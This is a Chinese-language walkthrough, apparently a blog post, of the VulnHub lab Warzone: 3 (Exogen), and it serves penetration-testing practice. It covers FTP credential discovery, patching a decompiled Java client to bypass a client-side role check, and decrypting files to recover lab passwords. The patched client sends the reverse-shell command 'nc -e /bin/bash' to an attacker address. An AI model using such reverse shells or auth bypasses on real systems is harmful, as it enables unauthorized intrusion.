Warzone: 3 (Exogen) vulnhub walkthrough

最新推荐文章于 2025-09-11 10:09:33 发布
原创 最新推荐文章于 2025-09-11 10:09:33 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文档详细介绍了在vulnhub上的Warzone: 3 (Exogen)靶机的渗透过程,从信息收集开始,通过FTP找到用户名和密码,反编译JAR包并利用本地权限提升获得shell。然后通过AES解密获取anunnaki用户权限,最后通过解密脚本和逆向工程获取root权限。

Warzone: 3 (Exogen)

vulnhub地址:http://www.vulnhub.com/entry/warzone-3-exogen,606/

0x01 信息收集到获取shell

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open  tcpwrapped

ftp以anonymous登录,下载文件note.txtalienclient.jar,其中note中含有登录用户名alienum和密码exogenesis

接着反编译jar包,来到感兴趣的地方。

Starter.javaactionPerformed方法中,判断用户权限时,由于存在本地鉴权问题(在idea调试过程中验证),所以在判断用户权限前添加一句role = "astronaut";来提升权限。

  public void actionPerformed(ActionEvent e) {
    if (e.getSource() == this.loginButton) {
      String username = this.userTextField.getText();
      String password = this.passwordField.getText();
      try {
        this.socket = new Socket("warzone.local", 4444);
        this.os = new ObjectOutputStream(this.socket.getOutputStream());
        RE login = new RE();
        login.setToken(null);
        login.setOption("LOGIN");
        login.setCmd(null);
        login.setValue(String.valueOf(username) + "@" + password);
        this.os.writeObject(login);
        this.is = new ObjectInputStream(this.socket.getInputStream());
        RE response = (RE)this.is.readObject();
        token = response.getToken();
        role = token.getRole();
        this.os.close();
        this.socket.close();
        if (response.getValue().equals("TRUE")) {
          dashboard();
        } else {
          JOptionPane.showMessageDialog(this, "Invalid Username or Password");
        } 
      } catch (IOException|ClassNotFoundException e1) {
        e1.printStackTrace();
      } 
    } 
    if (e.getSource() == this.resetButton) {
      this.userTextField.setText("");
      this.passwordField.setText("");
    } 
    if (e.getSource() == this.showPassword)
      if (this.showPassword.isSelected()) {
        this.passwordField.setEchoChar('0');
      } else {
        this.passwordField.setEchoChar('*');
      }  
    if (e.getSource() == this.viewButton)
      role = "astronaut"; /*代码修改处*/
      if (role.equals("researcher")) {
        JOptionPane.showMessageDialog(this, "Permission Denied");
      } else if (role.equals("astronaut")) {
        try {
          this.socket = new Socket("warzone.local", 4444);
          this.os = new ObjectOutputStream(this.socket.getOutputStream());
          RE list = new RE();
          token.setRole(role);
          list.setToken(token);
          list.setOption("VIEW");
          list.setCmd("LIST");
          list.setValue(null);
          this.os.writeObject(list);
          this.is = new ObjectInputStream(this.socket.getInputStream());
          RE response = (RE)this.is.readObject();
          this.os.close();
          this.socket.close();
          reportList(response.getValue());
        } catch (IOException e1) {
          e1.printStackTrace();
        } catch (ClassNotFoundException e1) {
          e1.printStackTrace();
        } 
      }  
    if (e.getSource() == this.uploadButton)
      JOptionPane.showMessageDialog(this, "Has not been implemented"); 
  }

继续跟代码,点击查看文档发现是执行代码list.setCmd("tail -5 " + f);,于是将它更改为list.setCmd("nc -e /bin/bash 192.168.56.103 8080");,重新编译执行。

  public void reportList(String value) {
    JFrame view = new JFrame("View Reports");
    GridLayout list = new GridLayout(2, 2);
    Container containerLIst = view.getContentPane();
    containerLIst.setLayout(list);
    containerLIst.setBackground(Color.GRAY);
    String[] files = value.split("@");
    byte b;
    int i;
    String[] arrayOfString1;
    for (i = (arrayOfString1 = files).length, b = 0; b < i; ) {
      final String f = arrayOfString1[b];
      if (f.contains(".txt")) {
        JButton name = new JButton(f);
        name.addActionListener(new ActionListener() {
              public void actionPerformed(ActionEvent e) {
                try {
                  Starter.this.socket = new Socket("warzone.local", 4444);
                  Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
                  RE list = new RE();
                  list.setToken(Starter.token);
                  list.setOption("VIEW");
                  list.setValue("VALUE");
                  list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /*代码修改处*/
                  Starter.this.os.writeObject(list);
                  Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
                  RE response = (RE)Starter.this.is.readObject();
                  Starter.this.os.close();
                  Starter.this.socket.close();
                  Starter.this.reportValue(response.getValue());
                } catch (IOException e1) {
                  e1.printStackTrace();
                } catch (ClassNotFoundException e1) {
                  e1.printStackTrace();
                } 
              }
            });
        containerLIst.add(name);
      } 
      b++;
    } 
    view.setVisible(true);
    view.setBounds(10, 10, 370, 600);
    view.setDefaultCloseOperation(3);
    view.setResizable(true);
    view.show();
  }

成功反弹shell。

kali@kali:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)

0x02 获取anunnaki用户权限

/home/exomorph目录下的aliens.encryptedwrz3encryptor.jar下载到本地(通过nc下载-过程略)。反编译wrz3encryptor.jar

  private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {
    try {
      Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
      Cipher cipher = Cipher.getInstance("AES");
      cipher.init(cipherMode, secretKey);
      FileInputStream inputStream = new FileInputStream(inputFile);
      byte[] inputBytes = new byte[(int)inputFile.length()];
      inputStream.read(inputBytes);
      byte[] outputBytes = cipher.doFinal(inputBytes);
      FileOutputStream outputStream = new FileOutputStream(outputFile);
      outputStream.write(outputBytes);
      inputStream.close();
      outputStream.close();
    } catch (NoSuchPaddingException|java.security.NoSuchAlgorithmException|java.security.InvalidKeyException|javax.crypto.BadPaddingException|javax.crypto.IllegalBlockSizeException|java.io.IOException ex) {
      throw new CryptoException("Error encrypting/decrypting file", ex);
    } 
  }

其实就是一个AES加密,看来整个warzone系列都喜欢弄点加密来迷惑人哈。以下是解密代码:

  public static void decrypt(String key, File inputFile, File outputFile) {
    doDeCrypto(2, key, inputFile, outputFile);
  }

  private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
    try {
      Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
      Cipher cipher = Cipher.getInstance("AES");
      cipher.init(cipherMode, secretKey);
      FileInputStream inputStream = new FileInputStream(inputFile);
      byte[] inputBytes = new byte[(int)inputFile.length()];
      inputStream.read(inputBytes);
      byte[] outputBytes = cipher.doFinal(inputBytes);
      FileOutputStream outputStream = new FileOutputStream(outputFile);
      outputStream.write(outputBytes);
      inputStream.close();
      outputStream.close();
      } catch (Exception ex) {
        ex.printStackTrace();
      }
  }

代码其实就把ciphermode从1改为了2,得到用户名密码anunnaki:nak1nak1..

kali@kali:~$ warzone3decrypt strings aliens.txt 
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..

ssh登陆后进入用户目录。

anunnaki@warzone3:~$ ls
info.txt  secpasskeeper.jar.gpg  underboss.txt
anunnaki@warzone3:~$ cat info.txt 
Remember to use --batch, 
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
anunnaki@warzone3:~$ cat underboss.txt 
。。。。。。
EXOGEN { WARZONE_UNDERBOSS_AL1EN }

0x03 获取root权限

按照提示解密secpasskeeper.jar.gpg

anunnaki@warzone3:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg #passphrase为nak1nak1..
anunnaki@warzone3:~$ ls
info.txt  secpasskeeper.jar  secpasskeeper.jar.gpg  underboss.txt

通过nc将secpasskeeper.jar下载到本地逆向分析,将代码Main修改为

public class Main {
  public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
    try {
      Scanner in = new Scanner(System.in);
      System.out.println("[Warzone 3] Root's Password Manager");
      System.out.print("Secret passphrase : ");
      String secret = in.nextLine();
      Cryptor cryptor = new Cryptor();
      Resources res = new Resources();
      String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
      String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
      if (true/*user.equals(sys)*/) { /*代码修改处*/
        String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
        System.out.println("[+] Success, the password is : " + plaintext);
      } else {
        System.out.println("[x] Failed");
      } 
    } catch (NullPointerException n) {
      System.out.println("[!] Terminated");
      System.exit(0);
    } 
  }
  
  public static String removeSalt(String salted) {
    String unsalted = salted.replace("al13n", "");
    return unsalted;
  }
}

随意输入,得到root用户密码ufo_phosXEN

[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {16 required}
[+] Success, the password is : ufo_phosXEN

anunnaki@warzone3:~$ su - root
Password: 
root@warzone3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@warzone3:~# ls
boss.txt  cron  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
root@warzone3:~# cat boss.txt 
。。。。。。
EXOGEN { WARZONE_FINAL_BOSS }
by Alienum with <3
Warzone: 2 vulnhub walkthrough
xdeclearn的博客
11-16 621
Warzone: 2 下载地址: http://www.vulnhub.com/entry/warzone-2,598/ 获取shell 端口扫描结果: PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 1337/tcp open tcpwrapped 使用anon
Vulnhub靶机实战-Warzone 2
黑白的博客
01-10 510
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.10 -p 1-65535 -oN nmap.A 开启端口 21,22,1337 以匿名用户登录ftp 三张图片分别是用户名密码和token,旗语吗?只在亮剑里面看过旗语 对照解密后: u
vulnhub-warzone_1
qq_41810304的博客
11-05 920
vulnhub靶机
Warzone: 2靶场渗透
最新发布
sucker的博客
09-11 585
启动的是名为 wrz2-app 的 Flask 应用,运行在 127.0.0.1:5000(仅本地回环地址可访问,外部设备无法直接连接);Nmap 无法识别标准服务,需输入 “用户名 / 密码 / Token” 认证,是靶机核心突破入口,需优先匹配已知账号密码测试。允许匿名登录,仅暴露 anon 目录(只读),无高危漏洞,主要价值是获取目录内潜在线索(如配置、字典)运行于默认端口,版本无高危漏洞,是常规远程管理入口,风险集中于弱口令 / 暴力破解。5,nc连接1337端口,成功获取shell。
Warzone: 1 vulnhub walkthrough
xdeclearn的博客
10-27 1080
Warzone: 1 虚拟机页面:http://www.vulnhub.com/entry/warzone-1,589/ Description Info : Created and Tested in Virtual Box, maybe you need to write code Based on : Crypto Scenario : You are trying to gain access to the enemy system Mission : Your mission is to ge
vulnhub靶场【warzone】之2
China_I_LOVE的博客
12-30 1154
一些加密,这里是海军旗帜加密学会分析代码,根据代码解出密码学会查看隐藏文件,在linux中的隐藏文件以开头当有ssh服务连接时,可以把靶机的本地地址端口进行转发然后会各种反弹shellbashnc等学会python提权学会sudo提权,这里是less。
warzone:冒险游戏的Warzone版本
02-08
3. **网络编程**:由于Warzone通常是多人在线对战,因此需要利用Java的Socket编程实现客户端与服务器之间的通信。玩家的动作会被编码成数据包发送到服务器,服务器再将结果广播给所有玩家。 4. **并发与多线程**:...
Warzone:一款位于战区的有趣安卓游戏!
06-22
战区 一款正在开发中的有趣安卓游戏! 它以火柴人为主角。 他正处于战区的中心,导弹在他身上阵阵袭来。 你的目标是让他尽可能长时间地躲避导弹。 游戏官网: : 在此处下载最新的 apk: 项目详情 ...
积分java源码-Warzone:一个先进的pvp游戏管理插件
06-06
Warzone 插件每周支持数以千计的独特玩家。 它是模块化设计,可以在每个地图的基础上支持多种游戏类型,而无需重新启动服务器。 设置 只需在目录中运行mvn clean install即可构建项目。 我们使用 Intellij 开发了这...
Vulnhub渗透记录2-Warzone2
qq_43936524的博客
12-12 721
文章目录下载端口扫描FTP连接1337端口反弹shellssh连接 下载 虚拟机下载地址:http://www.vulnhub.com/entry/warzone-2,598/ 攻击机:kail 192.168.169.128 靶机:192.168.169.131 端口扫描 找到靶机所在ip后进行端口扫描 nmap -A -p- -T4 -P0 192.168.169.131 FTP连接 开启了ftp服务 输入anonymous尝试匿名连接 发现靶机允许进行ftp匿名连接。 发现有三张PNG。 下载
vulnhub靶场【warzone】之3 【系列final最终章】
China_I_LOVE的博客
01-03 1434
该系列靶场主要都是对java进行初级考察对于jar包是否会反编译对于反编译出的文件,能否看懂,并进行逆向获取敏感信息gpg格式文件如何解密java代码编写的逻辑判断主要就是考察一点,常见的java函数,以及读懂java代码。
vulnhub靶场【warzone】之1
China_I_LOVE的博客
12-30 810
该靶场考察以下几点栅栏加密算法的识别,以及是否能够解密栅栏加密解密出的内容,自己能否一一测试,这里就是最终测试为网站目录对于java代码是否了解一些,以及AES算法所需要的东西,这些都需要去了解,java代码一定要能够看懂,最好就是能够自己编写解密的代码。当然这里也可以使用ai进行辅助,毕竟有那个条件对于隐藏文件是否能够找出,也就是常用命令ls -al对于python代码有简单的了解,至少要知道这个代码做了什么,然后才好进行逆向操作对于提权sudo的一些用法一些反弹shell。
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2630
Vulnhub DC-1、DC-2靶机通关手册
Vulnhub靶机实战-Warzone 1
黑白的博客
01-10 848
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A 开启端口 21,22,5000 以匿名用户登录ftp,发现了两个文件。 note里面提示请使用jar包加密密码 反编译一下jar包,用juid
Bioventus认可EXOGEN长达25年经过验证的骨愈合功效
美国商业资讯的博客
02-26 440
北卡罗莱纳州达勒姆--(美国商业资讯)--骨科解决方案的全球领导者Bioventus认可其EXOGEN超声骨愈合系统长达25年经过验证的骨愈合功效。EXOGEN使用低强度脉冲超声波(LIPUS)来帮助刺激机体的自然骨愈合机制并促进骨折愈合。对于无法自行愈合的骨折,其愈合率达86%1,对于有适应证的新发骨折,愈合速度提高38%2, 3。 此新闻稿包含多媒体内容。完整新闻稿可在以下网址查阅:ht...
vulnhub靶机-djinn3
臭nana的博客
07-01 2017
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
SECARMY VILLAGE: GRAYHAT CONFERENCE vulnhub walkthrough
xdeclearn的博客
11-14 2450
SECARMY VILLAGE: GRAYHAT CONFERENCE 虚拟机地址:https://download.vulnhub.com/secarmyvillage/SECARMY-VILLAGE-OSCP-GIVEAWAY.ova 主机探测、端口扫描这里就省略了,每次都写显得冗余了。 flag1 访问80端口,没有什么有价值信息,先dirb跑一下目录 ---- Scanning URL: http://192.168.132.141/ ---- ==> DIRECTORY: http://19
IA: Nemesis (1.0.1) vulnhub walkthrough
xdeclearn的博客
10-27 2312
文章目录IA: Nemesis (1.0.1)服务探测web渗透测试获取第二个flag提权至root获取第三个flag参考 IA: Nemesis (1.0.1) 虚拟机页面:http://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need
Aatral-Warzone项目:Java技术实践指南
从给定的文件信息中,我们可以提取到的IT知识点主要集中在Java编程领域,并且与一个特定的项目"Aatral-Warzone"相关。这个项目看起来是一个由小组开发的,且被标记为“战区小组项目”。虽然提供的信息较为有限,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值